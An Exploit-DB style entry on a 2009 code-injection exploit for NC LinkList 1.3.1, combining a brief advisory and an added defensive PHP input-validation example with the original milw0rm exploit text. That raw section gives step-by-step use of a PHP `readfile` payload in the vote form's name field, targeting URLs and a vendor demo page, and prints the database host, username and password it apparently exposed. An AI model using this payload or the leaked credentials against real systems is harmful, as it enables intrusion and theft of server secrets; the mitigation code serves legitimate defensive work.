Vendor: NC LinkList
By: ThE g0bL!N
CVSS: 9,3 (HIGH)
CWE: 78 (Remote Command Injection)
Product Name: NC LinkList
Affected Version From: 1.3.1
Affected Version To: 1.3.1
Patch Exists: YES
Related CWE: N/A
CPE: a:nc-soft:nc_linklist:1.3.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

NC LinkList 1.3.1 Remote Command injection Exploit

NC LinkList 1.3.1 contains a remote command injection vulnerability. An attacker can exploit it by sending a crafted HTTP request to the vulnerable application, injecting arbitrary commands that are then executed on the server side. A crafted HTTP request can also be used to read the application's configuration file.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the application.
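
For installations that cannot be upgraded immediately, the vote form's fields can be validated and stored as inert data. The following is an added example, not NC LinkList's code or the vendor's patch: it assumes the flaw comes from form values being written to a file that PHP later interprets, and the function names, field keys, data file path and 1-10 rating range are hypothetical.

```php
<?php
declare(strict_types=1);
// Added example with hypothetical names; not NC LinkList code or the vendor patch.
const VOTE_FILE = __DIR__ . '/data/votes.jsonl'; // assumed path: plain data, never include()'d
/** Validate the vote form fields; return a clean record, or null to reject. */
function clean_vote(array $post): ?array
{
    $get = fn(string $k): string => is_string($post[$k] ?? null) ? trim($post[$k]) : '';
    $name    = $get('name');
    $comment = $get('comment');
    $email   = filter_var($get('email'), FILTER_VALIDATE_EMAIL);
    $rating  = filter_var($get('rating'), FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 10]]); // 1-10 scale is assumed
    // Allow-list the name, so angle brackets and question marks never reach storage.
    if (preg_match('/^[\p{L}\p{N} .\'-]{1,60}$/u', $name) !== 1) return null;
    if ($email === false || $rating === false || strlen($comment) > 1000) return null;
    return ['name' => $name, 'email' => $email, 'rating' => $rating, 'comment' => $comment];
}

/** Append the record as one JSON line; JSON_HEX_TAG stores "<" and ">" as \u003C and \u003E. */
function store_vote(array $vote, string $file = VOTE_FILE): bool
{
    $json = json_encode($vote, JSON_HEX_TAG | JSON_UNESCAPED_UNICODE);
    return $json !== false
        && file_put_contents($file, $json . "\n", FILE_APPEND | LOCK_EX) !== false;
}

/** Render stored votes, escaping every field at output time. */
function render_votes(string $file = VOTE_FILE): string
{
    $html = '';
    $lines = is_file($file) ? file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : [];
    foreach ($lines ?: [] as $line) {
        $v = json_decode($line, true);
        if (!is_array($v)) continue;
        $html .= sprintf("<li>%s (%d/10): %s</li>\n",
            htmlspecialchars((string)$v['name'], ENT_QUOTES, 'UTF-8'),
            (int)$v['rating'],
            htmlspecialchars((string)$v['comment'], ENT_QUOTES, 'UTF-8'));
    }
    return $html;
}

// Constructed demo input: a PHP tag in the name is rejected; one in the comment stays inert.
$tmp = tempnam(sys_get_temp_dir(), 'vote');
var_dump(clean_vote(['name' => '<?php x ?>', 'email' => 'a@example.org', 'rating' => '10']));
$ok = clean_vote(['name' => 'Anna', 'email' => 'a@example.org', 'rating' => '10', 'comment' => '<?php x ?>']);
store_vote($ok, $tmp);
echo render_votes($tmp);
```

Keeping the data file outside the web root, or in a directory where the web server does not execute PHP, adds a second layer if validation is ever bypassed.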

Exploit-DB raw data:

--------------------------------------------------------------
NC LinkList 1.3.1 Remote Command injection Exploit
---------------------------------------------------------------
Founder :ThE g0bL!N
Vendor:http://www.php-linkverzeichnis.de
Thank You Very Much His0k4
Note: You Can choose Any Function in Php :)
---------------------------------------------------------------
Exploit:
--------
  1) Go To Url:
     ---------
     http://wwww.victim.co.il/[path]/index.php?action=vote&link=$number of links

  2) Write In:
     --------
     Ihr Name:       <? readfile("./inc/config.inc.php"); ?>.
     Ihre E-Mail:    x0q@hotmail.fr
     Ihre Bewertung: 10 sehr  Gut  # bel Hendia allah yahfad wa youstour
     Kommentar:      Hacked By ThE g0bL!N

  3) Post The Topic:
     --------------

  4) Then Go to:
     -----------
     http://www.victim.co.il/[path]/index.php?action=show&view=votings&link=$number of links .

  5) View Source:
     -----------
  
Example:
--------
  1)http://wwww.victim.co.il/[path]/index.php?action=vote&link=20000
  2)http://www.victim.co.il/[path]/index.php?action=show&view=votings&link=20000
  
Result:
--------
  $db_host = "localhost";            // MySQL - Hostname
$db_user = "d009b9e8";            // MySQL - Username
$db_pwd  = "iwkpwd99";            // MySQL - Passwort
$db_name = "d009b9e8";           // MySQL - database
Demo:
----
http://www.php-linkverzeichnis.de/demo/index.php?action=vote&link=800
----------------------------------------------------------------
Greetz : His0k4 Dos-Dz TeaM Snakes TeaM And All My Friends (dz)
-----------------------------------------------------------------

# milw0rm.com [2009-05-20]